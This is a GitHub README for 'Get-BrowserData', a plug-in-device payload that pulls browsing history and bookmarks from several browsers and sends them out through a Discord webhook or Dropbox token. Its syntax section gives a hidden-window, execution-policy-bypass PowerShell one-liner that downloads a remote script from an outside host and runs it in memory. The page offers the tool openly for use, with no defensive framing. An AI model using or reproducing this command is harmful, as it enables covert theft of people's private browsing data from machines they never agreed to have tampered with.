89 lines
2.6 KiB
Markdown
89 lines
2.6 KiB
Markdown

|
|
|
|
<!-- TABLE OF CONTENTS -->
|
|
<details>
|
|
<summary>Table of Contents</summary>
|
|
<ol>
|
|
<li><a href="#Description">Description</a></li>
|
|
<li><a href="#The-Function">The Function</a></li>
|
|
<li><a href="#Contact">Contact</a></li>
|
|
<li><a href="#Acknowledgments">Acknowledgments</a></li>
|
|
</ol>
|
|
</details>
|
|
|
|
# Get-BrowserData
|
|
|
|
<p align="center">
|
|
<a href="https://youtu.be/2qkgQAwDZgk">
|
|
<img src=https://i.ytimg.com/vi/2qkgQAwDZgk/maxresdefault.jpg width="300" alt="Python" />
|
|
</a>
|
|
<br>YouTube Tutorial
|
|
</p>
|
|
|
|
## Description
|
|
|
|
This payload can be used to retrieve the browsing history and bookmarks from Edge, Chrome, Opera GX, and Firefox (no bookmarks from firefox currently).
|
|
|
|
They are then exfiled using either Discord or Dropbox.
|
|
|
|
## The Function
|
|
|
|
### [Get-BrowserData]
|
|
|
|
* Plug in your device
|
|
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
|
|
* You no longer need to host your own version of this script
|
|
* $db is the variable that holds your DropBox token
|
|
* $dc is the variable that holds your Discord webhook
|
|
* Fill in either variable or both to set your exfil method
|
|
|
|
SYNTAX:
|
|
|
|
```
|
|
powershell -w h -ep bypass $dc='';$db='';iwr https://jakoby.lol/hgw | iex
|
|
```
|
|
|
|
<!-- CONTACT -->
|
|
## Contact
|
|
|
|
<h2 align="center">📱 My Socials 📱</h2>
|
|
<div align=center>
|
|
<table>
|
|
<tr>
|
|
<td align="center" width="96">
|
|
<a href="https://youtube.com/c/IamJakoby?sub_confirmation=1">
|
|
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/youtube-svgrepo-com.svg width="48" height="48" alt="C#" />
|
|
</a>
|
|
<br>YouTube
|
|
</td>
|
|
<td align="center" width="96">
|
|
<a href="https://twitter.com/I_Am_Jakoby">
|
|
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/twitter.png width="48" height="48" alt="Python" />
|
|
</a>
|
|
<br>Twitter
|
|
</td>
|
|
<td align="center" width="96">
|
|
<a href="https://www.instagram.com/i_am_jakoby/">
|
|
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/insta.png width="48" height="48" alt="Golang" />
|
|
</a>
|
|
<br>Instagram
|
|
</td>
|
|
<td align="center" width="96">
|
|
<a href="https://discord.gg/MYYER2ZcJF">
|
|
<img src=https://github.com/I-Am-Jakoby/I-Am-Jakoby/blob/main/img/discord-v2-svgrepo-com.svg width="48" height="48" alt="Jsonnet" />
|
|
</a>
|
|
<br>Discord
|
|
</td>
|
|
</tr>
|
|
</table>
|
|
</div>
|
|
|
|
|
|
|
|
<p align="right">(<a href="#top">back to top</a>)</p>
|
|
|
|
<!-- ACKNOWLEDGMENTS -->
|
|
## Acknowledgments
|
|
|
|
* [Hak5](https://hak5.org/)
|
|
* [UberGuidoZ](https://github.com/UberGuidoZ)
|